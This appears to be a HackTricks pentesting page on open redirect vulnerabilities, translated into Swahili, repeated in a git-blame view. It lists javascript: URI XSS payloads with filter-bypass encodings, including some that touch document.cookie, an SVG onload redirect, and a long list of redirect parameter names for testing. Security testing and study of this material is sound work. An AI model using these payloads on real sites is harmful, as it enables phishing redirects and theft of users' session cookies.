hacktricks/pentesting-web/open-redirect.md

# Uelekezaji wa Wazi

<details>

<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.

</details>

## Uelekezaji wa Wazi

### Uelekezaji kwa localhost au uwanja wa kiholela

{% content-ref url="ssrf-server-side-request-forgery/url-format-bypass.md" %}
[url-format-bypass.md](ssrf-server-side-request-forgery/url-format-bypass.md)
{% endcontent-ref %}

### Uelekezaji wa Wazi kwa XSS
```bash
#Basic payload, javascript code is executed after "javascript:"
javascript:alert(1)

#Bypass "javascript" word filter with CRLF
java%0d%0ascript%0d%0a:alert(0)

# Abuse bad subdomain filter
javascript://sub.domain.com/%0Aalert(1)

#Javascript with "://" (Notice that in JS "//" is a line coment, so new line is created before the payload). URL double encoding is needed
#This bypasses FILTER_VALIDATE_URL os PHP
javascript://%250Aalert(1)

#Variation of "javascript://" bypass when a query is also needed (using comments or ternary operator)
javascript://%250Aalert(1)//?1
javascript://%250A1?alert(1):0

#Others
%09Jav%09ascript:alert(document.domain)
javascript://%250Alert(document.location=document.cookie)
/%09/javascript:alert(1);
/%09/javascript:alert(1)
//%5cjavascript:alert(1);
//%5cjavascript:alert(1)
/%5cjavascript:alert(1);
/%5cjavascript:alert(1)
javascript://%0aalert(1)
<>javascript:alert(1);
//javascript:alert(1);
//javascript:alert(1)
/javascript:alert(1);
/javascript:alert(1)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
javascript:alert(1);
javascript:alert(1)
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
javascript:confirm(1)
javascript://https://whitelisted.com/?z=%0Aalert(1)
javascript:prompt(1)
jaVAscript://whitelisted.com//%0d%0aalert(1);//
javascript://whitelisted.com?%a0alert%281%29
/x:1/:///%01javascript:alert(document.cookie)/
";alert(0);//
```
## Kuelekeza wazi kupakia faili za svg
```markup
<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='http://www.example.com'"
xmlns="http://www.w3.org/2000/svg">
</svg>
</code>
```
## Vigezo vya kawaida vya kuingiza
```
/{payload}
?next={payload}
?url={payload}
?target={payload}
?rurl={payload}
?dest={payload}
?destination={payload}
?redir={payload}
?redirect_uri={payload}
?redirect_url={payload}
?redirect={payload}
/redirect/{payload}
/cgi-bin/redirect.cgi?{payload}
/out/{payload}
/out?{payload}
?view={payload}
/login?to={payload}
?image_url={payload}
?go={payload}
?return={payload}
?returnTo={payload}
?return_to={payload}
?checkout_url={payload}
?continue={payload}
?return_path={payload}
success=https://c1h2e1.github.io
data=https://c1h2e1.github.io
qurl=https://c1h2e1.github.io
login=https://c1h2e1.github.io
logout=https://c1h2e1.github.io
ext=https://c1h2e1.github.io
clickurl=https://c1h2e1.github.io
goto=https://c1h2e1.github.io
rit_url=https://c1h2e1.github.io
forward_url=https://c1h2e1.github.io
@https://c1h2e1.github.io
forward=https://c1h2e1.github.io
pic=https://c1h2e1.github.io
callback_url=https://c1h2e1.github.io
jump=https://c1h2e1.github.io
jump_url=https://c1h2e1.github.io
click?u=https://c1h2e1.github.io
originUrl=https://c1h2e1.github.io
origin=https://c1h2e1.github.io
Url=https://c1h2e1.github.io
desturl=https://c1h2e1.github.io
u=https://c1h2e1.github.io
page=https://c1h2e1.github.io
u1=https://c1h2e1.github.io
action=https://c1h2e1.github.io
action_url=https://c1h2e1.github.io
Redirect=https://c1h2e1.github.io
sp_url=https://c1h2e1.github.io
service=https://c1h2e1.github.io
recurl=https://c1h2e1.github.io
j?url=https://c1h2e1.github.io
url=//https://c1h2e1.github.io
uri=https://c1h2e1.github.io
u=https://c1h2e1.github.io
allinurl:https://c1h2e1.github.io
q=https://c1h2e1.github.io
link=https://c1h2e1.github.io
src=https://c1h2e1.github.io
tc?src=https://c1h2e1.github.io
linkAddress=https://c1h2e1.github.io
location=https://c1h2e1.github.io
burl=https://c1h2e1.github.io
request=https://c1h2e1.github.io
backurl=https://c1h2e1.github.io
RedirectUrl=https://c1h2e1.github.io
Redirect=https://c1h2e1.github.io
ReturnUrl=https://c1h2e1.github.io
```
## Mifano ya nambari

#### .Net
```bash
response.redirect("~/mysafe-subdomain/login.aspx")
```
#### Java
```bash
response.redirect("http://mysafedomain.com");
```
#### PHP

PHP ni lugha ya programu ya upande wa seva inayotumiwa sana kwa maendeleo ya wavuti.
```php
<?php
/* browser redirections*/
header("Location: http://mysafedomain.com");
exit;
?>
```
## Vifaa

* [https://github.com/0xNanda/Oralyzer](https://github.com/0xNanda/Oralyzer)

## Vyanzo

* Katika [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open Redirect](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect) unaweza kupata orodha za kufanya majaribio ya kuingiza data.\\
* [https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html)\\
* [https://github.com/cujanovic/Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads)
* [https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a](https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a)

<details>

<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
Translated ['binary-exploitation/heap/heap-functions-security-checks.md' 2024-05-14 11:15:08 +00:00			`# Uelekezaji wa Wazi`

Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00			`<details>`

Translated ['binary-exploitation/heap/heap-functions-security-checks.md' 2024-05-14 11:15:08 +00:00			`<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Njia nyingine za kusaidia HackTricks:`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['binary-exploitation/heap/heap-functions-security-checks.md' 2024-05-14 11:15:08 +00:00			`* Ikiwa unataka kuona kampuni yako ikitangazwa kwenye HackTricks au kupakua HackTricks kwa PDF Angalia [MIPANGO YA USAJILI](https://github.com/sponsors/carlospolop)!`
			`* Pata [bidhaa rasmi za PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Gundua [Familia ya PEASS](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [NFTs](https://opensea.io/collection/the-peass-family) ya kipekee`
			`* Jiunge na 💬 [Kikundi cha Discord](https://discord.gg/hRep4RUj7f) au kikundi cha [telegram](https://t.me/peass) au tufuate kwenye Twitter 🐦 [@carlospolopm](https://twitter.com/hacktricks\_live).`
			`* Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa [HackTricks](https://github.com/carlospolop/hacktricks) na [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) repos za github.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`

Translated ['binary-exploitation/heap/heap-functions-security-checks.md' 2024-05-14 11:15:08 +00:00			`## Uelekezaji wa Wazi`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['binary-exploitation/heap/heap-functions-security-checks.md' 2024-05-14 11:15:08 +00:00			`### Uelekezaji kwa localhost au uwanja wa kiholela`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00			`{% content-ref url="ssrf-server-side-request-forgery/url-format-bypass.md" %}`
			`[url-format-bypass.md](ssrf-server-side-request-forgery/url-format-bypass.md)`
			`{% endcontent-ref %}`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['binary-exploitation/heap/heap-functions-security-checks.md' 2024-05-14 11:15:08 +00:00			`### Uelekezaji wa Wazi kwa XSS`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```bash
			`#Basic payload, javascript code is executed after "javascript:"`
			`javascript:alert(1)`

			`#Bypass "javascript" word filter with CRLF`
			`java%0d%0ascript%0d%0a:alert(0)`

Translated ['binary-exploitation/heap/heap-functions-security-checks.md' 2024-05-14 11:15:08 +00:00			`# Abuse bad subdomain filter`
			`javascript://sub.domain.com/%0Aalert(1)`

GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`#Javascript with "://" (Notice that in JS "//" is a line coment, so new line is created before the payload). URL double encoding is needed`
			`#This bypasses FILTER_VALIDATE_URL os PHP`
			`javascript://%250Aalert(1)`

			`#Variation of "javascript://" bypass when a query is also needed (using comments or ternary operator)`
			`javascript://%250Aalert(1)//?1`
			`javascript://%250A1?alert(1):0`

			`#Others`
			`%09Jav%09ascript:alert(document.domain)`
			`javascript://%250Alert(document.location=document.cookie)`
			`/%09/javascript:alert(1);`
			`/%09/javascript:alert(1)`
			`//%5cjavascript:alert(1);`
			`//%5cjavascript:alert(1)`
			`/%5cjavascript:alert(1);`
			`/%5cjavascript:alert(1)`
			`javascript://%0aalert(1)`
			`<>javascript:alert(1);`
			`//javascript:alert(1);`
			`//javascript:alert(1)`
			`/javascript:alert(1);`
			`/javascript:alert(1)`
			`\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)`
			`javascript:alert(1);`
			`javascript:alert(1)`
			`javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)`
			`javascript:confirm(1)`
			`javascript://https://whitelisted.com/?z=%0Aalert(1)`
			`javascript:prompt(1)`
			`jaVAscript://whitelisted.com//%0d%0aalert(1);//`
			`javascript://whitelisted.com?%a0alert%281%29`
			`/x:1/:///%01javascript:alert(document.cookie)/`
			`";alert(0);//`
			```
Translated ['binary-exploitation/heap/heap-functions-security-checks.md' 2024-05-14 11:15:08 +00:00			`## Kuelekeza wazi kupakia faili za svg`
GitBook: [master] one page modified 2020-12-01 10:55:31 +00:00			```markup
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`<code>`
			`<?xml version="1.0" encoding="UTF-8" standalone="yes"?>`
			`<svg`
			`onload="window.location='http://www.example.com'"`
			`xmlns="http://www.w3.org/2000/svg">`
			`</svg>`
			`</code>`
			```
Translated ['binary-exploitation/heap/heap-functions-security-checks.md' 2024-05-14 11:15:08 +00:00			`## Vigezo vya kawaida vya kuingiza`
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			```
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`/{payload}`
			`?next={payload}`
			`?url={payload}`
			`?target={payload}`
			`?rurl={payload}`
			`?dest={payload}`
			`?destination={payload}`
			`?redir={payload}`
			`?redirect_uri={payload}`
			`?redirect_url={payload}`
			`?redirect={payload}`
			`/redirect/{payload}`
			`/cgi-bin/redirect.cgi?{payload}`
			`/out/{payload}`
			`/out?{payload}`
			`?view={payload}`
			`/login?to={payload}`
			`?image_url={payload}`
			`?go={payload}`
			`?return={payload}`
			`?returnTo={payload}`
			`?return_to={payload}`
			`?checkout_url={payload}`
			`?continue={payload}`
			`?return_path={payload}`
			`success=https://c1h2e1.github.io`
			`data=https://c1h2e1.github.io`
			`qurl=https://c1h2e1.github.io`
			`login=https://c1h2e1.github.io`
			`logout=https://c1h2e1.github.io`
			`ext=https://c1h2e1.github.io`
			`clickurl=https://c1h2e1.github.io`
			`goto=https://c1h2e1.github.io`
			`rit_url=https://c1h2e1.github.io`
			`forward_url=https://c1h2e1.github.io`
			`@https://c1h2e1.github.io`
			`forward=https://c1h2e1.github.io`
			`pic=https://c1h2e1.github.io`
			`callback_url=https://c1h2e1.github.io`
			`jump=https://c1h2e1.github.io`
			`jump_url=https://c1h2e1.github.io`
			`click?u=https://c1h2e1.github.io`
			`originUrl=https://c1h2e1.github.io`
			`origin=https://c1h2e1.github.io`
			`Url=https://c1h2e1.github.io`
			`desturl=https://c1h2e1.github.io`
			`u=https://c1h2e1.github.io`
			`page=https://c1h2e1.github.io`
			`u1=https://c1h2e1.github.io`
			`action=https://c1h2e1.github.io`
			`action_url=https://c1h2e1.github.io`
			`Redirect=https://c1h2e1.github.io`
			`sp_url=https://c1h2e1.github.io`
			`service=https://c1h2e1.github.io`
			`recurl=https://c1h2e1.github.io`
			`j?url=https://c1h2e1.github.io`
			`url=//https://c1h2e1.github.io`
			`uri=https://c1h2e1.github.io`
			`u=https://c1h2e1.github.io`
			`allinurl:https://c1h2e1.github.io`
			`q=https://c1h2e1.github.io`
			`link=https://c1h2e1.github.io`
			`src=https://c1h2e1.github.io`
			`tc?src=https://c1h2e1.github.io`
			`linkAddress=https://c1h2e1.github.io`
			`location=https://c1h2e1.github.io`
			`burl=https://c1h2e1.github.io`
			`request=https://c1h2e1.github.io`
			`backurl=https://c1h2e1.github.io`
			`RedirectUrl=https://c1h2e1.github.io`
			`Redirect=https://c1h2e1.github.io`
			`ReturnUrl=https://c1h2e1.github.io`
			```
Translated ['binary-exploitation/heap/heap-functions-security-checks.md' 2024-05-14 11:15:08 +00:00			`## Mifano ya nambari`
GitBook: [master] 2 pages modified 2020-10-22 09:33:22 +00:00
Translated ['binary-exploitation/heap/heap-functions-security-checks.md' 2024-05-14 11:15:08 +00:00			`#### .Net`
GitBook: [master] 2 pages modified 2020-10-22 09:33:22 +00:00			```bash
			`response.redirect("~/mysafe-subdomain/login.aspx")`
			```
Translated ['binary-exploitation/heap/heap-functions-security-checks.md' 2024-05-14 11:15:08 +00:00			`#### Java`
GitBook: [master] 2 pages modified 2020-10-22 09:33:22 +00:00			```bash
			`response.redirect("http://mysafedomain.com");`
			```
Translated ['binary-exploitation/heap/heap-functions-security-checks.md' 2024-05-14 11:15:08 +00:00			`#### PHP`
Translated to Swahili 2024-02-11 02:13:58 +00:00
Translated ['binary-exploitation/heap/heap-functions-security-checks.md' 2024-05-14 11:15:08 +00:00			`PHP ni lugha ya programu ya upande wa seva inayotumiwa sana kwa maendeleo ya wavuti.`
GitBook: [master] 2 pages modified 2020-10-22 09:33:22 +00:00			```php
			`<?php`
			`/* browser redirections*/`
			`header("Location: http://mysafedomain.com");`
			`exit;`
			`?>`
			```
Translated ['binary-exploitation/heap/heap-functions-security-checks.md' 2024-05-14 11:15:08 +00:00			`## Vifaa`
GitBook: [master] 354 pages modified 2020-07-29 09:22:22 +00:00
			`* [https://github.com/0xNanda/Oralyzer](https://github.com/0xNanda/Oralyzer)`

Translated ['binary-exploitation/heap/heap-functions-security-checks.md' 2024-05-14 11:15:08 +00:00			`## Vyanzo`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['binary-exploitation/heap/heap-functions-security-checks.md' 2024-05-14 11:15:08 +00:00			`* Katika [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open Redirect](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect) unaweza kupata orodha za kufanya majaribio ya kuingiza data.\\`
			`* [https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html)\\`
a 2024-02-06 03:10:38 +00:00			`* [https://github.com/cujanovic/Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads)`
			`* [https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a](https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`<details>`

Translated ['binary-exploitation/heap/heap-functions-security-checks.md' 2024-05-14 11:15:08 +00:00			`<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Njia nyingine za kusaidia HackTricks:`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['binary-exploitation/heap/heap-functions-security-checks.md' 2024-05-14 11:15:08 +00:00			`* Ikiwa unataka kuona kampuni yako ikionekana kwenye HackTricks au kupakua HackTricks kwa PDF Angalia [MIPANGO YA KUJIUNGA](https://github.com/sponsors/carlospolop)!`
			`* Pata [bidhaa rasmi za PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Gundua [Familia ya PEASS](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [NFTs](https://opensea.io/collection/the-peass-family) za kipekee`
			`* Jiunge na 💬 [Kikundi cha Discord](https://discord.gg/hRep4RUj7f) au kikundi cha [telegram](https://t.me/peass) au tufuate kwenye Twitter 🐦 [@carlospolopm](https://twitter.com/hacktricks\_live).`
			`* Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa [HackTricks](https://github.com/carlospolop/hacktricks) na [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`